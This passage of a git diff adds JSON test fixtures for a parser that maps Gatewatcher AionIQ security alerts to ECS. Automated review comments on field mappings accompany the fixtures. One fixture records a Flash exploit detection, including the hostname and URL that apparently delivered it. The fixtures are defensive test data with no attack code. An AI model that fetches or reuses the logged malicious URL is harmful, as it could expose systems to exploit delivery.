\"application/x-shockwave-flash\",\n \"analyzers_up\": 16,\n \"analyzed_clean\": 9,\n \"engines_last_update_date\": \"2024-09-03T17:15:00Z\",\n \"state\": \"Infected\",\n \"total_found\": \"3/16\",\n \"detail_scan_time\": 373,\n \"reporting_token\": \"\",\n \"analyzed_infected\": 3,\n 
\"detail_threat_found\": \"Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash\",\n \"analyzed_suspicious\": 0,\n \"analyzed_error\": 0,\n \"processing_time\": 1576,\n \"engine_id\": {\n \"5\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"c18ab9n\"\n },\n \"8\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"Exploit.Flash\",\n \"id\": \"ib54e9s\"\n },\n \"4\": {\n \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n \"threat_details\": \"\",\n \"id\": \"c10195e\"\n },\n \"14\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"t3114fn\"\n },\n \"13\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"sde882s\"\n },\n \"9\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"kfb8487\"\n },\n \"12\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"qb9308l\"\n },\n \"10\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"mb2b5fe\"\n },\n \"0\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"a32935b\"\n },\n \"15\": {\n \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n \"threat_details\": \"\",\n \"id\": \"we9a17t\"\n },\n \"6\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"c81e55c\"\n },\n \"7\": {\n \"scan_result\": \"NOT_SCANNED\",\n \"threat_details\": \"\",\n \"id\": \"e83bf1t\"\n },\n \"3\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"b557a5r\"\n },\n \"1\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"EXP/Flash.EB.502\",\n \"id\": \"acf9bba\"\n },\n \"11\": {\n \"scan_result\": \"NOT_SCANNED\",\n \"threat_details\": \"Unavailable (permanently_failed)\",\n \"id\": \"n00000e\"\n },\n \"2\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"SWF/Exploit\",\n \"id\": \"af7872b\"\n }\n },\n \"detail_wait_time\": 660,\n \"file_type_description\": \"Macromedia Flash Player\",\n \"code\": 1,\n \"magic_details\": \"Macromedia 
Flash data (compressed), version 13\",\n \"analyzed_other\": 4\n },\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"timestamp\": \"2024-09-11T09:15:23.329615+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 1779492455056060\n },\n \"destination\": {\n \"port\": 47858,\n \"ip\": \"27.0.0.144\"\n },\n \"url\": {\n \"domain\": \"chunky.enchantingweddingsandevents.co.uk\",\n \"path\": \"/?q=&g=BDvv&y=enL16_6s_&s=t5qV-&e=_b_J--DqR&w=C2pZhaRyfn3uVT_v5Sfgs\"\n },\n \"user_agent\": {\n \"original\": \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"chunky.enchantingweddingsandevents.co.uk\",\n \"version\": \"HTTP/1.1\",\n \"http_refer\": \"http://chunky.enchantingweddingsandevents.co.uk/topic/03251-esplanade-interoperability-fuchsias-renegotiate-percent-youngster-trounced/\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/x-shockwave-flash\",\n \"bytes\": 55351\n }\n },\n \"event\": {\n \"id\": \"7c4e2a77-3481-4201-8247-889fe0718ed8\",\n \"kind\": \"alert\",\n \"module\": \"malcore\",\n \"severity\": 1,\n \"category\": [\n \"network\",\n \"file\"\n ],\n \"created\": \"2024-09-11T09:15:23.329615+0000\",\n \"dataset\": \"alert\"\n }\n}", + "event": { + "category": [ + "file", + "network" + ], + "dataset": "alert", + "kind": "alert", + "module": "malcore", + "severity": 1 + }, + "@timestamp": "2024-09-11T09:31:00.111583Z", + "destination": { + "address": "27.0.0.144", + "ip": "27.0.0.144", + "port": 47858 + }, + "file": { + "hash": { + "sha256": "6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b" + }, + "name": "/", + "size": 55351 + }, + "gatewatcher": { + "event": { + "created": "2024-09-11T09:15:23.329615Z", + "id": "7c4e2a77-3481-4201-8247-889fe0718ed8" + }, + "file": { + "file_id": 219, + "gaps": false, + "magic": "Macromedia Flash data (compressed), version 13", + "sid": [ + 
"1100020" + ], + "state": "CLOSED", + "stored": true, + "tx_id": 2 + }, + "http": { + "hostname": "chunky.enchantingweddingsandevents.co.uk", + "http_refer": "http://chunky.enchantingweddingsandevents.co.uk/topic/03251-esplanade-interoperability-fuchsias-renegotiate-percent-youngster-trounced/" + }, + "malcore": { + "analyzed_clean": 9, + "analyzed_error": 0, + "analyzed_infected": 3, + "analyzed_other": 4, + "analyzed_suspicious": 0, + "analyzers_up": 16, + "code": 1, + "detail_scan_time": 373, + "detail_threat_found": "Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash", + "detail_wait_time": 660, + "engine_id": "{\"0\": {\"id\": \"a32935b\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"1\": {\"id\": \"acf9bba\", \"scan_result\": \"INFECTED\", \"threat_details\": \"EXP/Flash.EB.502\"}, \"10\": {\"id\": \"mb2b5fe\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"11\": {\"id\": \"n00000e\", \"scan_result\": \"NOT_SCANNED\", \"threat_details\": \"Unavailable (permanently_failed)\"}, \"12\": {\"id\": \"qb9308l\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"13\": {\"id\": \"sde882s\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"14\": {\"id\": \"t3114fn\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"15\": {\"id\": \"we9a17t\", \"scan_result\": \"UNSUPPORTED_FILE_TYPE\", \"threat_details\": \"\"}, \"2\": {\"id\": \"af7872b\", \"scan_result\": \"INFECTED\", \"threat_details\": \"SWF/Exploit\"}, \"3\": {\"id\": \"b557a5r\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"4\": {\"id\": \"c10195e\", \"scan_result\": \"UNSUPPORTED_FILE_TYPE\", \"threat_details\": \"\"}, \"5\": {\"id\": \"c18ab9n\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"6\": {\"id\": \"c81e55c\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"7\": {\"id\": \"e83bf1t\", \"scan_result\": \"NOT_SCANNED\", \"threat_details\": \"\"}, \"8\": {\"id\": \"ib54e9s\", \"scan_result\": \"INFECTED\", \"threat_details\": 
\"Exploit.Flash\"}, \"9\": {\"id\": \"kfb8487\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}}", + "engines_last_update_date": "2024-09-03T17:15:00Z", + "file_type": "application/x-shockwave-flash", + "file_type_description": "Macromedia Flash Player", + "magic_details": "Macromedia Flash data (compressed), version 13", + "processing_time": 1576, + "state": "Infected", + "total_found": "3/16" + }, + "network": { + "flow_id": 1779492455056060, + "timestamp": "2024-09-11T09:15:23.329615Z" + }, + "observer": { + "gcap": { + "hostname": "gcap-clement-l.gatewatcher.fr", + "ingress": { + "interface": { + "name": "monvirt" + } + }, + "version": "2.5.4.0-rc1" + }, + "log_format_version": "1.0.0", + "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f" + }, + "version": "1" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "bytes": 55351, + "mime_type": "application/x-shockwave-flash", + "status_code": 200 + }, + "version": "HTTP/1.1" + }, + "network": { + "protocol": "http", + "transport": "tcp" + }, + "observer": { + "hostname": "gcenter-clelyo-01.gatewatcher.com", + "product": "gcenter", + "vendor": "gatewatcher", + "version": "2.5.3.103" + }, + "related": { + "hash": [ + "6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b" + ], + "hosts": [ + "chunky.enchantingweddingsandevents.co.uk", + "gcenter-clelyo-01.gatewatcher.com" + ], + "ip": [ + "202.129.215.251", + "27.0.0.144" + ] + }, + "source": { + "address": "202.129.215.251", + "ip": "202.129.215.251", + "port": 80 + }, + "url": { + "domain": "chunky.enchantingweddingsandevents.co.uk", + "path": "/?q=&g=BDvv&y=enL16_6s_&s=t5qV-&e=_b_J--DqR&w=C2pZhaRyfn3uVT_v5Sfgs", + "registered_domain": "enchantingweddingsandevents.co.uk", + "subdomain": "chunky", + "top_level_domain": "co.uk" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "IE", + "original": "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", + "os": { + "name": "Windows", + "version": "7" + 
},
+ "version": "11.0"
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/metadata.json b/GateWatcher/aioniq_ecs/tests/metadata.json
new file mode 100644
index 000000000..0530043dc
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/metadata.json
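Review bot: The expected output in this fixture locks `gatewatcher.malcore.engine_id` in as a whole JSON document re-serialised inside a string (`"engine_id": "{\"0\": {\"id\": \"a32935b\", ...}}"`), so the per-engine `scan_result`/`threat_details` — the three `INFECTED` verdicts that justify `state: Infected` here — cannot be filtered, aggregated or correlated on without a second parse downstream. The parser that produces this is outside this chunk, so I cannot tell whether flattening is deliberate; if the nested map cannot be kept as an object, a flat keyword list of the infected engines' `threat_details` (already present in `detail_threat_found` as free text) would be far more usable than double-encoded JSON. The truncation of the input `@timestamp` `2024-09-11T09:31:00.111583612Z` to microseconds is expected for an RFC 3339 normaliser, but worth noting in the intake's changelog since sub-microsecond ordering between gcap events is lost.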
@@ -0,0 +1,113 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ V103", + "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" + } + }, + "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"mac\": \"00:50:56:91:85:03\",\n \"port\": 56098,\n \"ip\": \"10.2.19.131\"\n },\n \"metadata\": {\n \"flowbits\": [\n \"min.gethttp\",\n \"exe.no.referer\",\n \"ET.http.binary\"\n ]\n },\n \"@timestamp\": \"2024-09-12T13:24:51.231Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"community_id\": \"1:X+96B6BxVtmLT4rsbtdZeemyV0M=\",\n \"timestamp\": \"2024-09-12T13:24:15.978904+0000\",\n \"transport\": \"tcp\",\n \"tx_id\": 6,\n \"flow_id\": 803295979358070\n },\n \"destination\": {\n \"mac\": \"00:09:0f:09:00:12\",\n \"port\": 80,\n \"ip\": \"10.2.10.205\"\n },\n \"url\": {\n \"path\": \"/FireInstaller4.exe\"\n },\n \"user_agent\": {\n \"original\": \"nghttp2/1.43.0\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request_headers\": [\n {\n \"name\": \":method\",\n \"value\": \"GET\"\n },\n {\n \"name\": \":path\",\n \"value\": \"/FireInstaller4.exe\"\n },\n {\n \"name\": \":scheme\",\n \"value\": \"http\"\n },\n {\n \"name\": \":authority\",\n \"value\": \"10.2.10.205\"\n },\n {\n \"name\": \"accept\",\n \"value\": \"*/*\"\n },\n {\n \"name\": \"accept-encoding\",\n \"value\": \"gzip, deflate\"\n },\n {\n \"name\": \"user-agent\",\n \"value\": \"nghttp2/1.43.0\"\n }\n ],\n \"http2\": {\n \"request\": {\n \"priority\": 15\n },\n \"stream_id\": 13,\n \"response\": {}\n },\n \"request\": {\n \"method\": 
\"GET\"\n },\n \"response_headers\": [\n {\n \"name\": \":status\",\n \"value\": \"200\"\n },\n {\n \"name\": \"server\",\n \"value\": \"nginx/1.25.2\"\n },\n {\n \"name\": \"date\",\n \"value\": \"Mon, 08 Jan 2024 15:27:20 GMT\"\n },\n {\n \"name\": \"content-type\",\n \"value\": \"text/plain\"\n },\n {\n \"name\": \"content-length\",\n \"value\": \"319824\"\n },\n {\n \"name\": \"last-modified\",\n \"value\": \"Mon, 08 Jan 2024 15:21:12 GMT\"\n },\n {\n \"name\": \"etag\",\n \"value\": \"\\\"659c12e8-4e150\\\"\"\n },\n {\n \"name\": \"accept-ranges\",\n \"value\": \"bytes\"\n }\n ],\n \"version\": \"2\",\n \"response\": {\n \"status\": 200,\n \"bytes\": 319824\n }\n },\n \"event\": {\n \"kind\": \"event\",\n \"module\": \"sigflow_http\",\n \"category\": [\n \"network\"\n ],\n \"created\": \"2024-09-12T13:24:15.978904+0000\",\n \"dataset\": \"network_metadata\",\n \"id\": \"78681613-57af-4e10-b732-58f5d2e0ae12\"\n }\n}" + }, + "expected": { + "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"mac\": \"00:50:56:91:85:03\",\n \"port\": 56098,\n \"ip\": \"10.2.19.131\"\n },\n \"metadata\": {\n \"flowbits\": [\n \"min.gethttp\",\n \"exe.no.referer\",\n \"ET.http.binary\"\n ]\n },\n \"@timestamp\": \"2024-09-12T13:24:51.231Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"community_id\": \"1:X+96B6BxVtmLT4rsbtdZeemyV0M=\",\n \"timestamp\": \"2024-09-12T13:24:15.978904+0000\",\n \"transport\": \"tcp\",\n \"tx_id\": 6,\n \"flow_id\": 803295979358070\n },\n \"destination\": {\n \"mac\": \"00:09:0f:09:00:12\",\n \"port\": 80,\n \"ip\": 
\"10.2.10.205\"\n },\n \"url\": {\n \"path\": \"/FireInstaller4.exe\"\n },\n \"user_agent\": {\n \"original\": \"nghttp2/1.43.0\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request_headers\": [\n {\n \"name\": \":method\",\n \"value\": \"GET\"\n },\n {\n \"name\": \":path\",\n \"value\": \"/FireInstaller4.exe\"\n },\n {\n \"name\": \":scheme\",\n \"value\": \"http\"\n },\n {\n \"name\": \":authority\",\n \"value\": \"10.2.10.205\"\n },\n {\n \"name\": \"accept\",\n \"value\": \"*/*\"\n },\n {\n \"name\": \"accept-encoding\",\n \"value\": \"gzip, deflate\"\n },\n {\n \"name\": \"user-agent\",\n \"value\": \"nghttp2/1.43.0\"\n }\n ],\n \"http2\": {\n \"request\": {\n \"priority\": 15\n },\n \"stream_id\": 13,\n \"response\": {}\n },\n \"request\": {\n \"method\": \"GET\"\n },\n \"response_headers\": [\n {\n \"name\": \":status\",\n \"value\": \"200\"\n },\n {\n \"name\": \"server\",\n \"value\": \"nginx/1.25.2\"\n },\n {\n \"name\": \"date\",\n \"value\": \"Mon, 08 Jan 2024 15:27:20 GMT\"\n },\n {\n \"name\": \"content-type\",\n \"value\": \"text/plain\"\n },\n {\n \"name\": \"content-length\",\n \"value\": \"319824\"\n },\n {\n \"name\": \"last-modified\",\n \"value\": \"Mon, 08 Jan 2024 15:21:12 GMT\"\n },\n {\n \"name\": \"etag\",\n \"value\": \"\\\"659c12e8-4e150\\\"\"\n },\n {\n \"name\": \"accept-ranges\",\n \"value\": \"bytes\"\n }\n ],\n \"version\": \"2\",\n \"response\": {\n \"status\": 200,\n \"bytes\": 319824\n }\n },\n \"event\": {\n \"kind\": \"event\",\n \"module\": \"sigflow_http\",\n \"category\": [\n \"network\"\n ],\n \"created\": \"2024-09-12T13:24:15.978904+0000\",\n \"dataset\": \"network_metadata\",\n \"id\": \"78681613-57af-4e10-b732-58f5d2e0ae12\"\n }\n}", + "event": { + "category": [ + "network" + ], + "dataset": "network_metadata", + "kind": "event", + "module": "sigflow_http" + }, + "@timestamp": "2024-09-12T13:24:51.231000Z", + "destination": { + "address": "10.2.10.205", + "ip": "10.2.10.205", + "mac": 
"00:09:0f:09:00:12",
+ "port": 80
+ },
+ "gatewatcher": {
+ "event": {
+ "created": "2024-09-12T13:24:15.978904Z",
+ "id": "78681613-57af-4e10-b732-58f5d2e0ae12"
+ },
+ "http": {
+ "http2": "{\"request\": {\"priority\": 15}, \"response\": {}, \"stream_id\": 13}"
+ },
+ "metadata": {
+ "flowbits": [
+ "ET.http.binary",
+ "exe.no.referer",
+ "min.gethttp"
+ ]
+ },
+ "network": {
+ "flow_id": 803295979358070,
+ "timestamp": "2024-09-12T13:24:15.978904Z",
+ "tx_id": 6
+ },
+ "observer": {
+ "gcap": {
+ "hostname": "gcap-clement-l.gatewatcher.fr",
+ "ingress": {
+ "interface": {
+ "name": "monvirt"
+ }
+ },
+ "version": "2.5.4.0-rc1"
+ },
+ "log_format_version": "1.0.0",
+ "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+ },
+ "version": "1"
+ },
+ "http": {
+ "request": {
+ "method": "GET"
+ },
+ "response": {
+ "bytes": 319824,
+ "status_code": 200
+ },
+ "version": "2"
+ },
+ "network": {
+ "community_id": "1:X+96B6BxVtmLT4rsbtdZeemyV0M=",
+ "protocol": "http",
+ "transport": "tcp"
+ },
+ "observer": {
+ "hostname": "gcenter-clelyo-01.gatewatcher.com",
+ "product": "gcenter",
+ "vendor": "gatewatcher",
+ "version": "2.5.3.103"
+ },
+ "related": {
+ "hosts": [
+ "gcenter-clelyo-01.gatewatcher.com"
+ ],
+ "ip": [
+ "10.2.10.205",
+ "10.2.19.131"
+ ]
+ },
+ "source": {
+ "address": "10.2.19.131",
+ "ip": "10.2.19.131",
+ "mac": "00:50:56:91:85:03",
+ "port": 56098
+ },
+ "url": {
+ "path": "/FireInstaller4.exe"
+ },
+ "user_agent": {
+ "device": {
+ "name": "Other"
+ },
+ "name": "Other",
+ "original": "nghttp2/1.43.0",
+ "os": {
+ "name": "Other"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json b/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json
new file mode 100644
index 000000000..d575e8d2a
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json
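Review bot: The expected output drops the input's `http.request_headers` and `http.response_headers` entirely, so the `content-type: text/plain` and `server: nginx/1.25.2` returned for `/FireInstaller4.exe` — the MIME/extension mismatch that the `exe.no.referer` and `ET.http.binary` flowbits are pointing at — do not survive into the parsed event, and `http.response.mime_type` stays unset here while the malcore fixture populates it. The `:authority` header value `10.2.10.205` could likewise fill `url.domain`, which is also absent from the expected document even though the source event carries it. `gatewatcher.http.http2` is again a JSON object re-serialised into a string (`"http2": "{\"request\": {\"priority\": 15}, ...}"`) rather than a nested object. The parser is outside this chunk, so I cannot tell whether these are mapping gaps or intentional; if intentional, the intake README should say that HTTP/2 pseudo-headers and raw header lists are discarded.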
@@ -0,0 +1,117 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ V103", + "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" + } + }, + "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"port\": 80,\n \"ip\": \"56.53.117.115\"\n },\n \"file\": {\n \"magic\": \"PDF document, version 1.5\",\n \"sid\": [\n 1100008\n ],\n \"hash\": {\n \"sha256\": \"50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703\"\n },\n \"name\": \"/malcore_10KB_clean.pdf\",\n \"file_id\": 224,\n \"tx_id\": 0,\n \"state\": \"CLOSED\",\n \"gaps\": false,\n \"size\": 10456,\n \"stored\": true\n },\n \"@timestamp\": \"2024-09-11T13:56:19.010Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"timestamp\": \"2024-09-11T13:55:51.326090+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 1331841998458539\n },\n \"destination\": {\n \"port\": 62832,\n \"ip\": \"65.100.113.120\"\n },\n \"url\": {\n \"domain\": \"56.53.117.115\",\n \"path\": \"/malcore_10KB_clean.pdf\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"56.53.117.115\",\n \"version\": \"HTTP/1.1\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/pdf\",\n \"bytes\": 10456\n }\n },\n \"event\": {\n \"kind\": \"event\",\n \"module\": \"sigflow_file\",\n \"category\": [\n \"network\",\n \"file\"\n ],\n \"created\": \"2024-09-11T13:55:51.326090+0000\",\n \"dataset\": \"network_metadata\",\n \"id\": \"d66539e6-825e-4516-8c8c-2778dd6d9358\"\n }\n}" + }, + "expected": { + "message": "{\n 
\"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"port\": 80,\n \"ip\": \"56.53.117.115\"\n },\n \"file\": {\n \"magic\": \"PDF document, version 1.5\",\n \"sid\": [\n 1100008\n ],\n \"hash\": {\n \"sha256\": \"50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703\"\n },\n \"name\": \"/malcore_10KB_clean.pdf\",\n \"file_id\": 224,\n \"tx_id\": 0,\n \"state\": \"CLOSED\",\n \"gaps\": false,\n \"size\": 10456,\n \"stored\": true\n },\n \"@timestamp\": \"2024-09-11T13:56:19.010Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"timestamp\": \"2024-09-11T13:55:51.326090+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 1331841998458539\n },\n \"destination\": {\n \"port\": 62832,\n \"ip\": \"65.100.113.120\"\n },\n \"url\": {\n \"domain\": \"56.53.117.115\",\n \"path\": \"/malcore_10KB_clean.pdf\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"56.53.117.115\",\n \"version\": \"HTTP/1.1\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/pdf\",\n \"bytes\": 10456\n }\n },\n \"event\": {\n \"kind\": \"event\",\n \"module\": \"sigflow_file\",\n \"category\": [\n \"network\",\n \"file\"\n ],\n \"created\": \"2024-09-11T13:55:51.326090+0000\",\n \"dataset\": \"network_metadata\",\n \"id\": \"d66539e6-825e-4516-8c8c-2778dd6d9358\"\n }\n}", + "event": { + "category": [ + "file", + "network" + ], + "dataset": "network_metadata", + "kind": "event", + "module": "sigflow_file" + }, + "@timestamp": "2024-09-11T13:56:19.010000Z", + "destination": { + "address": 
"65.100.113.120",
+ "ip": "65.100.113.120",
+ "port": 62832
+ },
+ "file": {
+ "hash": {
+ "sha256": "50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703"
+ },
+ "name": "/malcore_10KB_clean.pdf",
+ "size": 10456
+ },
+ "gatewatcher": {
+ "event": {
+ "created": "2024-09-11T13:55:51.326090Z",
+ "id": "d66539e6-825e-4516-8c8c-2778dd6d9358"
+ },
+ "file": {
+ "file_id": 224,
+ "gaps": false,
+ "magic": "PDF document, version 1.5",
+ "sid": [
+ "1100008"
+ ],
+ "state": "CLOSED",
+ "stored": true,
+ "tx_id": 0
+ },
+ "http": {
+ "hostname": "56.53.117.115"
+ },
+ "network": {
+ "flow_id": 1331841998458539,
+ "timestamp": "2024-09-11T13:55:51.326090Z"
+ },
+ "observer": {
+ "gcap": {
+ "hostname": "gcap-clement-l.gatewatcher.fr",
+ "ingress": {
+ "interface": {
+ "name": "monvirt"
+ }
+ },
+ "version": "2.5.4.0-rc1"
+ },
+ "log_format_version": "1.0.0",
+ "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+ },
+ "version": "1"
+ },
+ "http": {
+ "request": {
+ "method": "GET"
+ },
+ "response": {
+ "bytes": 10456,
+ "mime_type": "application/pdf",
+ "status_code": 200
+ },
+ "version": "HTTP/1.1"
+ },
+ "network": {
+ "protocol": "http",
+ "transport": "tcp"
+ },
+ "observer": {
+ "hostname": "gcenter-clelyo-01.gatewatcher.com",
+ "product": "gcenter",
+ "vendor": "gatewatcher",
+ "version": "2.5.3.103"
+ },
+ "related": {
+ "hash": [
+ "50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703"
+ ],
+ "hosts": [
+ "56.53.117.115",
+ "gcenter-clelyo-01.gatewatcher.com"
+ ],
+ "ip": [
+ "56.53.117.115",
+ "65.100.113.120"
+ ]
+ },
+ "source": {
+ "address": "56.53.117.115",
+ "ip": "56.53.117.115",
+ "port": 80
+ },
+ "url": {
+ "domain": "56.53.117.115",
+ "path": "/malcore_10KB_clean.pdf"
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/nba.json b/GateWatcher/aioniq_ecs/tests/nba.json
new file mode 100644
index 000000000..c4540e394
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/nba.json
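Review bot: `gatewatcher.file.sid` is expected as the string array `["1100008"]` although the input carries the integer `1100008` and the sibling `file_id`/`tx_id` keep their integer type; a Suricata signature id that is a number in one field and a string in another will not join against numeric rule ids elsewhere in the intake. In the same document `related.hosts` receives the IP literal `56.53.117.115` (lifted from `http.hostname`/`url.domain`) which `related.ip` already holds, so anyone pivoting on hosts gets an address, not a hostname. I would expect `"sid": [1100008]` (or every id consistently stringified) and IP literals filtered out of `related.hosts`; both are parser changes outside this chunk, but the fixture should not cement the current shape until that is decided.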
@@ -0,0 +1,139 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ V103", + "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" + } + }, + "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n \"version\": \"2.5.3.107\",\n \"ingress\": {\n \"interface\": {\n \"name\": \"mon0\"\n }\n }\n },\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"alert\",\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"module\": \"network_behavior_analytics\",\n \"created\": \"2022-09-01T16:06:15.605Z\",\n \"id\": \"730a47f1-f7b1-4faa-9d61-8a41d7b138ed\",\n \"severity\": 2\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"network\": {\n \"transport\": \"tcp\",\n \"protocol\": \"http\",\n \"flow_id\": 2071994639527866,\n \"community_id\": \"1:Q22WBDRnlyCXH/Y/pcypXCr+nJc=\",\n \"timestamp\": \"2022-09-01T16:06:15.605Z\",\n \"tx_id\": 0\n },\n \"source\": {\n \"ip\": \"10.2.6.250\",\n \"port\": 50886,\n \"mac\": \"00:50:56:91:73:14\"\n },\n \"destination\": {\n \"ip\": \"13.107.4.52\",\n \"port\": 80,\n \"mac\": \"00:08:e3:ff:fc:28\"\n },\n \"nba\": {\n \"packet\": \"AAjj//woAFBWkXMUCABFAAAo6pNAAEAGLaIKAgb6DWsENMbGAFBecku30OsVlVAQAfUzhAAAAAAAAAAA\",\n \"payload\": 